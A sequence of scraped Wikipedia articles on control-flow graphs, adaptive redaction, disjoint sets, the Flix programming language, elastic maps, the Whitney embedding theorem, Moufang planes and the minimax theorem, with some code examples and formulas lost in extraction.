The CFG can thus be obtained, at least conceptually, by starting from the program's (full) flow graph—i.e. the graph in which every node represents an individual instruction—and performing anedge contractionfor every edge that falsifies the predicate above, i.e. contracting every edge whose source has a single exit and whose destination has a single entry. This contraction-based algorithm is of no practical importance, except as a visualization aid for understanding the CFG construction, because the CFG can be more efficiently constructed directly from the program byscanning it for basic blocks.[4]
Consider the following fragment of code:
In the above, we have 4 basic blocks: A from 0 to 1, B from 2 to 3, C at 4 and D at 5. In particular, in this case, A is the "entry block", D the "exit block" and lines 4 and 5 are jump targets. A graph for this fragment has edges from A to B, A to C, B to D and C to D.
Reachabilityis a graph property useful in optimization.
If a subgraph is not connected from the subgraph containing the entry block, that subgraph is unreachable during any execution, and so isunreachable code; under normal conditions it can be safely removed.
If the exit block is unreachable from the entry block, aninfinite loopmay exist. Not all infinite loops are detectable, seeHalting problem. A halting order may also exist there.
Unreachable code and infinite loops are possible even if the programmer does not explicitly code them: optimizations likeconstant propagationandconstant foldingfollowed byjump threadingcan collapse multiple basic blocks into one, cause edges to be removed from a CFG, etc., thus possibly disconnecting parts of the graph.
A block Mdominatesa block N if every path from the entry that reaches block N has to pass through block M. The entry block dominates all blocks.
In the reverse direction, block Mpostdominatesblock N if every path from N to the exit has to pass through block M. The exit block postdominates all blocks.
It is said that a block Mimmediately dominatesblock N if M dominates N, and there is no intervening block P such that M dominates P and P dominates N. In other words, M is the last dominator on all paths from entry to N. Each block has a unique immediate dominator.
Similarly, there is a notion ofimmediate postdominator, analogous toimmediate dominator.
Thedominator treeis an ancillary data structure depicting the dominator relationships. There is an arc from Block M to Block N if M is an immediate dominator of N. This graph is a tree, since each block has a unique immediate dominator. This tree is rooted at the entry block. The dominator tree can be calculated efficiently usingLengauer–Tarjan's algorithm.
Apostdominator treeis analogous to thedominator tree. This tree is rooted at the exit block.
Aback edgeis an edge that points to a block that has already been met during a depth-first (DFS) traversal of the graph. Back edges are typical of loops.
Acritical edgeis an edge which is neither the only edge leaving its source block, nor the only edge entering its destination block. These edges must besplit: a new block must be created in the middle of the edge, in order to insert computations on the edge without affecting any other edges.
Anabnormal edgeis an edge whose destination is unknown.Exception handlingconstructs can produce them. These edges tend to inhibit optimization.
Animpossible edge(also known as afake edge) is an edge which has been added to the graph solely to preserve the property that the exit block postdominates all blocks. It cannot ever be traversed.
Aloop header(sometimes called theentry pointof the loop) is a dominator that is the target of a loop-forming back edge. The loop header dominates all blocks in the loop body. A block may be a loop header for more than one loop. A loop may have multiple entry points, in which case it has no "loop header".
Suppose block M is a dominator with several incoming edges, some of them being back edges (so M is a loop header). It is advantageous to several optimization passes to break M up into two blocks Mpreand Mloop. The contents of M and back edges are moved to Mloop, the rest of the edges are moved to point into Mpre, and a new edge from Mpreto Mloopis inserted (so that Mpreis the immediate dominator of Mloop). In the beginning, Mprewould be empty, but passes likeloop-invariant code motioncould populate it. Mpreis called theloop pre-header, and Mloopwould be the loop header.
A reducible CFG is one with edges that can be partitioned into two disjoint sets: forward edges, and back edges, such that:[5]
Structured programminglanguages are often designed such that all CFGs they produce are reducible, and common structured programming statements such as IF, FOR, WHILE, BREAK, and CONTINUE produce reducible graphs. To produce irreducible graphs, statements such asGOTOare needed. Irreducible graphs may also be produced by some compiler optimizations.
The loop connectedness of a CFG is defined with respect to a givendepth-first searchtree (DFST) of the CFG. This DFST should be rooted at the start node and cover every node of the CFG.
Edges in the CFG which run from a node to one of its DFST ancestors (including itself) are called back edges.
The loop connectedness is the largest number of back edges found in any cycle-free path of the CFG. In a reducible CFG, the loop connectedness is independent of the DFST chosen.[6][7]
Loop connectedness has been used to reason about the time complexity ofdata-flow analysis.[6]
While control-flow graphs represent the control flow of a single procedure, inter-procedural control-flow graphs represent the control flow of whole programs.[8]
|
https://en.wikipedia.org/wiki/Control-flow_graph
|
Adaptive redactionis a form ofredactionwhereby sensitive parts of a document are automatically removed based onpolicy. It is primarily used in next generationData Loss Prevention(DLP) solutions.[1]
The policy is a set of rules based on content and context. Context can include:
The content can be 'visible' information, such as that you see on the screen. For example, sending unprotectedcredit cardinformation outside an organisation breaches thePayment Card Industry Data Security Standard(PCI DSS regulations). Many organisations accept credit card information through incomingemail, but a reply to an email containing such information would send out the prohibited information. That would cause a breach of policy. Adaptive redaction can therefore be used to remove just the credit card number but allow the email to be sent.
Content can also be 'invisible' information such as that indocumentproperties andrevision history, and it can also be 'active' content which has been embedded in an electronic document, such as amacro. Release of 'invisible' information has on several occasions created embarrassment for government bodies.[2][3]
Adaptive redaction is designed to alleviate "False Positive" events created withData loss prevention software(DLP) security solutions. False positives occur when a DLP policy triggers and prevents legitimate outgoing communication. In the majority of cases this is caused through oversight by the sender.
|
https://en.wikipedia.org/wiki/Adaptive_redaction
|
Inset theoryinmathematicsandformal logic, twosetsare said to bedisjoint setsif they have noelementin common. Equivalently, two disjoint sets are sets whoseintersectionis theempty set.[1]For example, {1, 2, 3} and {4, 5, 6} aredisjoint sets,while {1, 2, 3} and {3, 4, 5} are not disjoint. A collection of two or more sets is called disjoint if any two distinct sets of the collection are disjoint.
This definition of disjoint sets can be extended tofamilies of setsand toindexed familiesof sets.
By definition, a collection of sets is called afamily of sets(such as thepower set, for example). In some sources this is a set of sets, while other sources allow it to be amultisetof sets, with some sets repeated.
Anindexed familyof sets(Ai)i∈I,{\displaystyle \left(A_{i}\right)_{i\in I},}is by definition a set-valuedfunction(that is, it is a function that assigns a setAi{\displaystyle A_{i}}to every elementi∈I{\displaystyle i\in I}in its domain) whose domainI{\displaystyle I}is called itsindex set(and elements of its domain are calledindices).
There are two subtly different definitions for when a family of setsF{\displaystyle {\mathcal {F}}}is calledpairwise disjoint. According to one such definition, the family is disjoint if each two sets in the family are either identical or disjoint. This definition would allow pairwise disjoint families of sets to have repeated copies of the same set. According to an alternative definition, each two sets in the family must be disjoint; repeated copies are not allowed. The same two definitions can be applied to an indexed family of sets: according to the first definition, every two distinct indices in the family must name sets that are disjoint or identical, while according to the second, every two distinct indices must name disjoint sets.[2]For example, the family of sets{ {0, 1, 2}, {3, 4, 5}, {6, 7, 8}, ... }is disjoint according to both definitions, as is the family{ {..., −2, 0, 2, 4, ...}, {..., −3, −1, 1, 3, 5} }of the two parity classes of integers. However, the family({n+2k∣k∈Z})n∈{0,1,…,9}{\displaystyle (\{n+2k\mid k\in \mathbb {Z} \})_{n\in \{0,1,\ldots ,9\}}}with 10 members has five repetitions each of two disjoint sets, so it is pairwise disjoint under the first definition but not under the second.
Two sets are said to bealmost disjoint setsif their intersection is small in some sense. For instance, twoinfinite setswhose intersection is afinite setmay be said to be almost disjoint.[3]
Intopology, there are various notions ofseparated setswith more strict conditions than disjointness. For instance, two sets may be considered to be separated when they have disjointclosuresor disjointneighborhoods. Similarly, in ametric space,positively separated setsare sets separated by a nonzerodistance.[4]
Disjointness of two sets, or of a family of sets, may be expressed in terms ofintersectionsof pairs of them.
Two setsAandBare disjoint if and only if their intersectionA∩B{\displaystyle A\cap B}is theempty set.[1]It follows from this definition that every set is disjoint from the empty set,
and that the empty set is the only set that is disjoint from itself.[5]
If a collection contains at least two sets, the condition that the collection is disjoint implies that the intersection of the whole collection is empty. However, a collection of sets may have an empty intersection without being disjoint. Additionally, while a collection of less than two sets is trivially disjoint, as there are no pairs to compare, the intersection of a collection of one set is equal to that set, which may be non-empty.[2]For instance, the three sets{ {1, 2}, {2, 3}, {1, 3} }have an empty intersection but are not disjoint. In fact, there are no two disjoint sets in this collection.
The empty family of sets is pairwise disjoint.[6]
AHelly familyis a system of sets within which the only subfamilies with empty intersections are the ones that are pairwise disjoint. For instance, theclosed intervalsof thereal numbersform a Helly family: if a family of closed intervals has an empty intersection and is minimal (i.e. no subfamily of the family has an empty intersection), it must be pairwise disjoint.[7]
Apartition of a setXis any collection of mutually disjoint non-empty sets whoseunionisX.[8]Every partition can equivalently be described by anequivalence relation, abinary relationthat describes whether two elements belong to the same set in the partition.[8]Disjoint-set data structures[9]andpartition refinement[10]are two techniques in computer science for efficiently maintaining partitions of a set subject to, respectively, union operations that merge two sets or refinement operations that split one set into two.
Adisjoint unionmay mean one of two things. Most simply, it may mean the union of sets that are disjoint.[11]But if two or more sets are not already disjoint, their disjoint union may be formed by modifying the sets to make them disjoint before forming the union of the modified sets.[12]For instance two sets may be made disjoint by replacing each element by an ordered pair of the element and a binary value indicating whether it belongs to the first or second set.[13]For families of more than two sets, one may similarly replace each element by an ordered pair of the element and the index of the set that contains it.[14]
|
https://en.wikipedia.org/wiki/Disjoint_sets
|
Flixis afunctional,imperative, andlogicprogramming languagedeveloped atAarhus University, with funding from theIndependent Research Fund Denmark,[2]and by a community ofopen sourcecontributors.[3]The Flix language supportsalgebraic data types,pattern matching,parametric polymorphism,currying,higher-order functions,extensible records,[4]channel and process-based concurrency, andtail call elimination. Two notable features of Flix are its type and effect system[5]and its support for first-class Datalog constraints.[6]
The Flix type and effect system supportsHindley-Milner-styletype inference. The system separates pure and impure code: if an expression is typed as pure then it cannot produce an effect at run-time. Higher-order functions can enforce that they are given pure (or impure) function arguments. The type and effect system supportseffect polymorphism[7][8]which means that the effect of a higher-order function may depend on the effect(s) of its argument(s).
Flix supportsDatalogprograms asfirst-classvalues. A Datalog program value, i.e. a collection of Datalog facts and rules, can be passed to and returned from functions, stored in data structures, and composed with other Datalog program values. Theminimal modelof a Datalog program value can be computed and is itself a Datalog program value. In this way, Flix can be viewed as ameta programminglanguage for Datalog. Flix supportsstratified negationand the Flix compiler ensures stratification at compile-time.[9]Flix also supports an enriched form of Datalog constraints where predicates are givenlatticesemantics.[10][11][12][13]
Flix is aprogramming languagein theML-family of languages. Its type and effect system is based onHindley-Milnerwith several extensions, includingrow polymorphismandBoolean unification. The syntax of Flix is inspired byScalaand uses shortkeywordsandcurly braces. Flix supportsuniform function call syntaxwhich allows a function callf(x, y, z)to be written asx.f(y, z). The concurrency model of Flix is inspired byGoand based onchannels and processes. A process is a light-weight thread that does not share (mutable) memory with another process. Processes communicate over channels which are bounded or unbounded queues of immutable messages.
While many programming languages support a mixture of functional and imperative programming, the Flix type and effect system tracks the purity of every expression making it possible to write parts of a Flix program in apurely functional stylewith purity enforced by the effect system.
Flix programs compile toJVM bytecodeand are executable on theJava Virtual Machine(JVM).[14]The Flix compiler performswhole program compilation, eliminates polymorphism viamonomorphization,[15]and usestree shakingto removeunreachable code.
Monomorphization avoidsboxingof primitive values at the cost of longer compilation times and larger executable binaries. Flix has some support for interoperability with programs written inJava.[16]
Flix supportstail call eliminationwhich ensures that function calls in tail position never consume stack space and hence cannot cause the call stack to overflow.[17]Since theJVM instruction setlacks explicit support for tail calls, such calls are emulated using a form of reusable stack frames.[18]Support for tail call elimination is important since all iteration in Flix is expressed throughrecursion.
The Flix compiler disallows most forms of unused or redundant code, including: unused local variables, unused functions, unused formal parameters, unused type parameters, and unused type declarations, such unused constructs are reported as compiler errors.[19]Variable shadowingis also disallowed. The stated rationale is that unused or redundant code is often correlated with erroneous code[20]
AVisual Studio Codeextension for Flix is available.[21]The extension is based on theLanguage Server Protocol, a common interface betweenIDEsandcompilersbeing developed byMicrosoft.
Flix isopen source softwareavailable under theApache 2.0 License.
The following program prints "Hello World!" when compiled and executed:
The type and effect signature of themainfunction specifies that it has no parameters, returns a value of typeUnit, and that the function has the IO effect, i.e. is impure. Themainfunction is impure because it invokesprintLinewhich is impure.
The following program fragment declares analgebraic data type(ADT) namedShape:
The ADT has three constructors:Circle,Square, andRectangle.
The following program fragment usespattern matchingto destruct aShapevalue:
The following program fragment defines ahigher-order functionnamedtwicethat when given a functionffromInttoIntreturns a function that appliesfto its input two times:
We can use the functiontwiceas follows:
Here the call totwice(x -> x + 1)returns a function that will increment its argument two times. Thus the result of the whole expression is0 + 1 + 1 = 2.
The following program fragment illustrates apolymorphic functionthat maps a functionf: a -> bover a list of elements of typeareturning a list of elements of typeb:
Themapfunction recursively traverses the listland appliesfto each element constructing a new list.
Flix supports type parameter elision hence it is not required that the type parametersaandbare explicitly introduced.
The following program fragment shows how to construct arecordwith two fieldsxandy:
Flix usesrow polymorphismto type records. Thesumfunction below takes a record that hasxandyfields (and possibly other fields) and returns the sum of the two fields:
The following are all valid calls to thesumfunction:
The Flix type and effect system separates pure and impure expressions.[5][22][23]A pure expression is guaranteed to bereferentially transparent. A pure function always returns the same value when given the same argument(s) and cannot have any (observable) side-effects.
For example, the following expression is of typeInt32and has the empty effect set{}, i.e. it is pure:
whereas the following expression has theIOeffect, i.e. is impure:
A higher-order function can specify that a function argument must be pure, impure, or that it is effect polymorphic.
For example, the definition ofSet.existsrequires that its function argumentfis pure:
The requirement thatfmust be pure ensures that implementation details do notleak. For example, sincefis pure it cannot be used to determine in what order the elements of the set are traversed. Iffwas impure such details could leak, e.g. by passing a function that also prints the current element, revealing the internal element order inside the set.
A higher-order function can also require that a function is impure.
For example, the definition ofList.foreachrequires that its function argumentfis impure:
The requirement thatfmust be impure ensures that the code makes sense: It would be meaningless to callList.foreachwith a pure function since it always returnsUnit.
The type and effect is sound, but not complete. That is, if a function is pure then itcannotcause an effect, whereas if a function is impure then itmay, but not necessarily, cause an effect. For example, the following expression is impure even though it cannot produce an effect at run-time:
A higher-order function can also be effect polymorphic: its effect(s) can depend on its argument(s).
For example, the standard library definition ofList.mapis effect polymorphic:[24]
TheList.mapfunction takes a functionffrom elements of typeatobwith effecte. The effect of the map function is itselfe. Consequently, ifList.mapis invoked with a pure function then the entire expression is pure whereas if it is invoked with an impure function then the entire expression is impure. It is effect polymorphic.
A higher-order function that takes multiple function arguments may combine their effects.
For example, the standard library definition of forwardfunction composition>>is pure if both its function arguments are pure:[25]
The type and effect signature can be understood as follows: The>>function takes two function arguments:fwith effecte1andgwith effecte2. The effect of>>is effect polymorphic in theconjunctionofe1ande2. If both are pure then the overall expression is pure.
The type and effect system allows arbitrary set expressions to control the purity of function arguments.
For example, it is possible to express a higher-order functionhthat accepts two function argumentsfandgwhere the effects offare disjoint from those ofg:
Ifhis called with a function argumentfwhich has theIOeffect thengcannot have theIOeffect.
The type and effect system can be used to ensure that statement expressions are useful, i.e. that if an expression or function is evaluated and its result is discarded then it must have a side-effect. For example, compiling the program fragment below:
causes a compiler error:
because it is non-sensical to evaluate the pure expressionList.map(x -> 2 * x, 1 :: 2 :: Nil)and then to discard its result. Most likely the programmer wanted to use the result (or alternatively the expression is redundant and could be deleted). Consequently, Flix rejects such programs.
Flix supportsDatalogprograms as first-class values.[6][9][26]A Datalog program is a logic program that consists of a collection of unorderedfactsandrules. Together, the facts and rules imply aminimal model, a unique solution to any Datalog program. In Flix, Datalog program values can be passed to and returned from functions, stored in data structures, composed with other Datalog program values, and solved. The solution to a Datalog program (the minimal model) is itself a Datalog program. Thus, it is possible to construct pipelines of Datalog programs where the solution, i.e. "output", of one Datalog program becomes the "input" to another Datalog program.
The following edge facts define a graph:
The following Datalog rules compute thetransitive closureof the edge relation:
The minimal model of the facts and rules is:
In Flix, Datalog programs are values. The above program can beembeddedin Flix as follows:
The local variablefholds a Datalog program value that consists of the edge facts. Similarly, the local variablepis a Datalog program value that consists of the two rules. Thef <+> pexpression computes the composition (i.e. union) of the two Datalog programsfandp. Thesolveexpression computes the minimal model of the combined Datalog program, returning the edge and path facts shown above.
Since Datalog programs are first-class values, we can refactor the above program into several functions. For example:
The un-directed closure of the graph can be computed by adding the rule:
We can modify theclosurefunction to take a Boolean argument that determines whether we want to compute the directed or un-directed closure:
The Flix type system ensures that Datalog program values are well-typed.
For example, the following program fragment does not type check:
because inp1the type of theEdgepredicate isEdge(Int32, Int32)whereas inp2it has typeEdge(String, String). The Flix compiler rejects such programs as ill-typed.
The Flix compiler ensures that every Datalog program value constructed at run-time isstratified. Stratification is important because it guarantees the existence of a unique minimal model in the presence of negation. Intuitively, a Datalog program is stratified if there is no recursion through negation,[27]i.e. a predicate cannot depend negatively on itself. Given a Datalog program, acycle detectionalgorithm can be used to determine if it is stratified.
For example, the following Flix program contains an expression that cannot be stratified:
because the last expression constructs a Datalog program value whoseprecedence graphcontains a negative cycle: theBachelorpredicate negatively depends on theHusbandpredicate which in turn (positively) depends on theBachelorpredicate.
The Flix compiler computes the precedence graph for every Datalog program valued expression and determines its stratification at compile-time. If an expression is not stratified, the program is rejected by the compiler.
The stratification is sound, but conservative. For example, the following program isunfairly rejected:
The type system conservatively assumes that both branches of the if expression can be taken and consequently infers that there may be a negative cycle between theAandBpredicates. Thus the program is rejected. This is despite the fact that at run-time themainfunction always returns a stratified Datalog program value.
Flix is designed around a collection of stated principles:[28]
The principles also list several programming language features that have been deliberately omitted. In particular, Flix lacks support for:
|
https://en.wikipedia.org/wiki/Flix_(programming_language)
|
Elastic mapsprovide a tool fornonlinear dimensionality reduction. By their construction, they are a system of elasticspringsembedded in the data
space.[1]This system approximates a low-dimensional manifold. The elastic coefficients of this system allow the switch from completely unstructuredk-means clustering(zero elasticity) to the estimators located closely to linearPCA manifolds(for high bending and low stretching modules). With some intermediate values of theelasticity coefficients, this system effectively approximates non-linear principal manifolds. This approach is based on amechanicalanalogy between principal manifolds, that are passing through "the middle" of the data distribution, and elastic membranes and plates. The method was developed byA.N. Gorban,A.Y. Zinovyevand A.A. Pitenko in 1996–1998.
LetS{\displaystyle {\mathcal {S}}}be a data set in a finite-dimensionalEuclidean space. Elastic map is represented by a set of nodeswj{\displaystyle {\bf {w}}_{j}}in the same space. Each datapoints∈S{\displaystyle s\in {\mathcal {S}}}has ahost node, namely the closest nodewj{\displaystyle {\bf {w}}_{j}}(if there are several closest nodes then one takes the node with the smallest number). The data setS{\displaystyle {\mathcal {S}}}is divided into classesKj={s|wjis a host ofs}{\displaystyle K_{j}=\{s\ |\ {\bf {w}}_{j}{\mbox{ is a host of }}s\}}.
Theapproximation energyD is the distortion
which is the energy of the springs with unit elasticity which connect each data point with its host node. It is possible to apply weighting factors to the terms of this sum, for example to reflect thestandard deviationof theprobability density functionof any subset of data points{si}{\displaystyle \{s_{i}\}}.
On the set of nodes an additional structure is defined. Some pairs of nodes,(wi,wj){\displaystyle ({\bf {w}}_{i},{\bf {w}}_{j})}, are connected byelastic edges. Call this set of pairsE{\displaystyle E}. Some triplets of nodes,(wi,wj,wk){\displaystyle ({\bf {w}}_{i},{\bf {w}}_{j},{\bf {w}}_{k})}, formbending ribs. Call this set of tripletsG{\displaystyle G}.
whereλ{\displaystyle \lambda }andμ{\displaystyle \mu }are the stretching and bending moduli respectively. The stretching energy is sometimes referred to as themembrane, while the bending energy is referred to as thethin plateterm.[5]
For example, on the 2D rectangular grid the elastic edges are just vertical and horizontal edges (pairs of closest vertices) and the bending ribs are the vertical or horizontal triplets of consecutive (closest) vertices.
The position of the nodes{wj}{\displaystyle \{{\bf {w}}_{j}\}}is determined by themechanical equilibriumof the elastic map, i.e. its location is such that it minimizes the total energyU{\displaystyle U}.
For a given splitting of datasetS{\displaystyle {\mathcal {S}}}in classesKj{\displaystyle K_{j}}, minimization of the quadratic functionalU{\displaystyle U}is a linear problem with the sparse matrix of coefficients. Therefore, similar toprincipal component analysisork-means, a splitting method is used:
Thisexpectation-maximization algorithmguarantees a local minimum ofU{\displaystyle U}. For improving the approximation various additional methods are proposed. For example, thesofteningstrategy is used. This strategy
starts with a rigid grids (small length, small bending and large elasticity modulesλ{\displaystyle \lambda }andμ{\displaystyle \mu }coefficients) and finishes with soft grids (smallλ{\displaystyle \lambda }andμ{\displaystyle \mu }). The training goes in several epochs, each epoch with its own grid rigidness. Another adaptive strategy isgrowing net: one starts from a small number of nodes and gradually adds new nodes. Each epoch goes with its own number of nodes.
Most important applications of the method and free software[3]are in bioinformatics[7][8]for exploratory data analysis and visualisation of multidimensional data, for data visualisation in economics, social and political sciences,[9]as an auxiliary tool for data mapping in geographic informational systems and for visualisation of data of various nature.
The method is applied in quantitative biology for reconstructing the curved surface of a tree leaf from a stack of light microscopy images.[10]This reconstruction is used for quantifying thegeodesicdistances betweentrichomesand their patterning, which is a marker of the capability of a plant to resist to pathogenes.
Recently, the method is adapted as a support tool in the decision process underlying the selection, optimization, and management offinancial portfolios.[11]
The method of elastic maps has been systematically tested and compared with severalmachine learningmethods on the applied problem of identification of the flow regime of agas-liquid flowin a pipe.[12]There are various regimes: Single phase water or air flow, Bubbly flow, Bubbly-slug flow, Slug flow, Slug-churn flow, Churn flow, Churn-annular flow, and Annular flow. The simplest and most common method used to identify the flow regime is visual observation. This approach is, however, subjective and unsuitable for relatively high gas and liquid flow rates. Therefore, the machine learning methods are proposed by many authors. The methods are applied to differential pressure data collected during a calibration process. The method of elastic maps provided a 2D map, where the area of each regime is represented. The comparison with some other machine learning methods is presented in Table 1 for various pipe diameters and pressure.
Here, ANN stands for thebackpropagationartificial neural networks, SVM stands for thesupport vector machine, SOM for theself-organizing maps. The hybrid technology was developed for engineering applications.[13]In this technology, elastic maps are used in combination withPrincipal Component Analysis(PCA),Independent Component Analysis(ICA) and backpropagation ANN.
The textbook[14]provides a systematic comparison of elastic maps andself-organizing maps(SOMs) in applications to economic and financial decision-making.
|
https://en.wikipedia.org/wiki/Elastic_map
|
Inmathematics, particularly indifferential topology, there are two Whitney embedding theorems, named afterHassler Whitney:
The weak Whitney embedding is proved through a projection argument.
When the manifold iscompact, one can first use a covering by finitely many local charts and then reduce the dimension with suitable projections.[1]: Ch. 1 §3[2]: Ch. 6[3]: Ch. 5 §3
The general outline of the proof is to start with an immersionf:M→R2m{\displaystyle f:M\to \mathbb {R} ^{2m}}withtransverseself-intersections. These are known to exist from Whitney's earlier work onthe weak immersion theorem. Transversality of the double points follows from a general-position argument. The idea is to then somehow remove all the self-intersections. IfMhas boundary, one can remove the self-intersections simply by isotopingMinto itself (the isotopy being in the domain off), to a submanifold ofMthat does not contain the double-points. Thus, we are quickly led to the case whereMhas no boundary. Sometimes it is impossible to remove the double-points via an isotopy—consider for example the figure-8 immersion of the circle in the plane. In this case, one needs to introduce a local double point.
Once one has two opposite double points, one constructs a closed loop connecting the two, giving a closed path inR2m.{\displaystyle \mathbb {R} ^{2m}.}SinceR2m{\displaystyle \mathbb {R} ^{2m}}issimply connected, one can assume this path bounds a disc, and provided2m> 4one can further assume (by theweak Whitney embedding theorem) that the disc is embedded inR2m{\displaystyle \mathbb {R} ^{2m}}such that it intersects the image ofMonly in its boundary. Whitney then uses the disc to create a1-parameter familyof immersions, in effect pushingMacross the disc, removing the two double points in the process. In the case of the figure-8 immersion with its introduced double-point, the push across move is quite simple (pictured).
This process of eliminatingopposite signdouble-points by pushing the manifold along a disc is called theWhitney Trick.
To introduce a local double point, Whitney created immersionsαm:Rm→R2m{\displaystyle \alpha _{m}:\mathbb {R} ^{m}\to \mathbb {R} ^{2m}}which are approximately linear outside of the unit ball, but containing a single double point. Form= 1such an immersion is given by
Notice that ifαis considered as a map toR3{\displaystyle \mathbb {R} ^{3}}like so:
then the double point can be resolved to an embedding:
Noticeβ(t, 0) = α(t)and fora≠ 0then as a function oft,β(t,a)is an embedding.
For higher dimensionsm, there areαmthat can be similarly resolved inR2m+1.{\displaystyle \mathbb {R} ^{2m+1}.}For an embedding intoR5,{\displaystyle \mathbb {R} ^{5},}for example, define
This process ultimately leads one to the definition:
where
The key properties ofαmis that it is an embedding except for the double-pointαm(1, 0, ... , 0) = αm(−1, 0, ... , 0). Moreover, for|(t1, ... ,tm)|large, it is approximately the linear embedding(0,t1, 0,t2, ... , 0,tm).
The Whitney trick was used byStephen Smaleto prove theh-cobordism theorem; from which follows thePoincaré conjecturein dimensionsm≥ 5, and the classification ofsmooth structureson discs (also in dimensions 5 and up). This provides the foundation forsurgery theory, which classifies manifolds in dimension 5 and above.
Given two oriented submanifolds of complementary dimensions in a simply connected manifold of dimension ≥ 5, one can apply an isotopy to one of the submanifolds so that all the points of intersection have the same sign.
The occasion of the proof byHassler Whitneyof the embedding theorem for smooth manifolds is said (rather surprisingly) to have been the first complete exposition of themanifold conceptprecisely because it brought together and unified the differing concepts of manifolds at the time: no longer was there any confusion as to whether abstract manifolds, intrinsically defined via charts, were any more or less general than manifolds extrinsically defined as submanifolds of Euclidean space. See also thehistory of manifolds and varietiesfor context.
Although everyn-manifold embeds inR2n,{\displaystyle \mathbb {R} ^{2n},}one can frequently do better. Lete(n)denote the smallest integer so that all compact connectedn-manifolds embed inRe(n).{\displaystyle \mathbb {R} ^{e(n)}.}Whitney's strong embedding theorem states thate(n) ≤ 2n. Forn= 1, 2we havee(n) = 2n, as thecircleand theKlein bottleshow. More generally, forn= 2kwe havee(n) = 2n, as the2k-dimensionalreal projective spaceshow. Whitney's result can be improved toe(n) ≤ 2n− 1unlessnis a power of 2. This is a result ofAndré HaefligerandMorris Hirsch(forn> 4) andC. T. C. Wall(forn= 3); these authors used important preliminary results and particular cases proved by Hirsch,William S. Massey,Sergey NovikovandVladimir Rokhlin.[4]At present the functioneis not known in closed-form for all integers (compare to theWhitney immersion theorem, where the analogous number is known).
One can strengthen the results by putting additional restrictions on the manifold. For example, then-spherealways embeds inRn+1{\displaystyle \mathbb {R} ^{n+1}}– which is the best possible (closedn-manifolds cannot embed inRn{\displaystyle \mathbb {R} ^{n}}). Any compactorientablesurface and any compact surfacewith non-empty boundaryembeds inR3,{\displaystyle \mathbb {R} ^{3},}though anyclosed non-orientablesurface needsR4.{\displaystyle \mathbb {R} ^{4}.}
IfNis a compact orientablen-dimensional manifold, thenNembeds inR2n−1{\displaystyle \mathbb {R} ^{2n-1}}(fornnot a power of 2 the orientability condition is superfluous). Forna power of 2 this is a result ofAndré HaefligerandMorris Hirsch(forn> 4), and Fuquan Fang (forn= 4); these authors used important preliminary results proved by Jacques Boéchat and Haefliger,Simon Donaldson, Hirsch andWilliam S. Massey.[4]Haefliger proved that ifNis a compactn-dimensionalk-connectedmanifold, thenNembeds inR2n−k{\displaystyle \mathbb {R} ^{2n-k}}provided2k+ 3 ≤n.[4]
A relatively 'easy' result is to prove that any two embeddings of a 1-manifold intoR4{\displaystyle \mathbb {R} ^{4}}are isotopic (seeKnot theory#Higher dimensions). This is proved using general position, which also allows to show that any two embeddings of ann-manifold intoR2n+2{\displaystyle \mathbb {R} ^{2n+2}}are isotopic. This result is an isotopy version of the weak Whitney embedding theorem.
Wu proved that forn≥ 2, any two embeddings of ann-manifold intoR2n+1{\displaystyle \mathbb {R} ^{2n+1}}are isotopic. This result is an isotopy version of the strong Whitney embedding theorem.
As an isotopy version of his embedding result,Haefligerproved that ifNis a compactn-dimensionalk-connected manifold, then any two embeddings ofNintoR2n−k+1{\displaystyle \mathbb {R} ^{2n-k+1}}are isotopic provided2k+ 2 ≤n. The dimension restriction2k+ 2 ≤nis sharp: Haefliger went on to give examples of non-trivially embedded 3-spheres inR6{\displaystyle \mathbb {R} ^{6}}(and, more generally,(2d− 1)-spheres inR3d{\displaystyle \mathbb {R} ^{3d}}). Seefurther generalizations.
|
https://en.wikipedia.org/wiki/Whitney_embedding_theorem
|
Ingeometry, aMoufang plane, named forRuth Moufang, is a type ofprojective plane, more specifically a special type oftranslation plane. A translation plane is a projective plane that has atranslation line, that is, a line with the property that the group of automorphisms that fixes every point of the lineactstransitively on the points of the plane not on the line.[1]A translation plane is Moufang if every line of the plane is a translation line.[2]
A Moufang plane can also be described as a projective plane in which thelittle Desargues theoremholds.[3]This theorem states that a restricted form ofDesargues' theoremholds for every line in the plane.[4]For example, everyDesarguesian planeis a Moufang plane.[5]
In algebraic terms, a projective plane over anyalternative division ringis a Moufang plane,[6]and this gives a 1:1 correspondence between isomorphism classes of alternative division rings and of Moufang planes.
As a consequence of the algebraicArtin–Zorn theorem, that every finite alternative division ring is a field, every finite Moufang plane is Desarguesian, but some infinite Moufang planes arenon-Desarguesian planes. In particular, theCayley plane, an infinite Moufang projective plane over theoctonions, is one of these because the octonions do not form a division ring.[7]
The following conditions on a projective planePare equivalent:[8]
Also, in a Moufang plane:
|
https://en.wikipedia.org/wiki/Moufang_plane
|
In the mathematical area ofgame theoryand ofconvex optimization, aminimax theoremis a theorem that claims that
under certain conditions on the setsX{\displaystyle X}andY{\displaystyle Y}and on the functionf{\displaystyle f}.[1]It is always true that the left-hand side is at most the right-hand side (max–min inequality) but equality only holds under certain conditions identified by minimax theorems. The first theorem in this sense isvon Neumann's minimax theorem about two-playerzero-sum gamespublished in 1928,[2]which is considered the starting point ofgame theory. Von Neumann is quoted as saying "As far as I can see, there could be no theory of games ... without that theorem ... I thought there was nothing worth publishing until the Minimax Theorem was proved".[3]Since then, several generalizations and alternative versions of von Neumann's original theorem have appeared in the literature.[4][5]
Von Neumann's original theorem[2]was motivated by game theory and applies to the case where
Under these assumptions, von Neumann proved that
In the context of two-playerzero-sum games, the setsX{\displaystyle X}andY{\displaystyle Y}correspond to the strategy sets of the first and second player, respectively, which consist of lotteries over their actions (so-calledmixed strategies), and their payoffs are defined by thepayoff matrixA{\displaystyle A}. The functionf(x,y){\displaystyle f(x,y)}encodes theexpected valueof the payoff to the first player when the first player plays the strategyx{\displaystyle x}and the second player plays the strategyy{\displaystyle y}.
Von Neumann's minimax theorem can be generalized to domains that are compact and convex, and to functions that are concave in their first argument and convex in their second argument (known as concave-convex functions). Formally, letX⊆Rn{\displaystyle X\subseteq \mathbb {R} ^{n}}andY⊆Rm{\displaystyle Y\subseteq \mathbb {R} ^{m}}becompactconvexsets. Iff:X×Y→R{\displaystyle f:X\times Y\rightarrow \mathbb {R} }is a continuous function that is concave-convex, i.e.
Then we have that
Sion's minimax theorem is a generalization of von Neumann's minimax theorem due toMaurice Sion,[6]relaxing the requirement that X and Y be standard simplexes and that f be bilinear. It states:[6][7]
LetX{\displaystyle X}be aconvexsubset of alinear topological spaceand letY{\displaystyle Y}be acompactconvexsubset of alinear topological space. Iff{\displaystyle f}is a real-valuedfunctiononX×Y{\displaystyle X\times Y}with
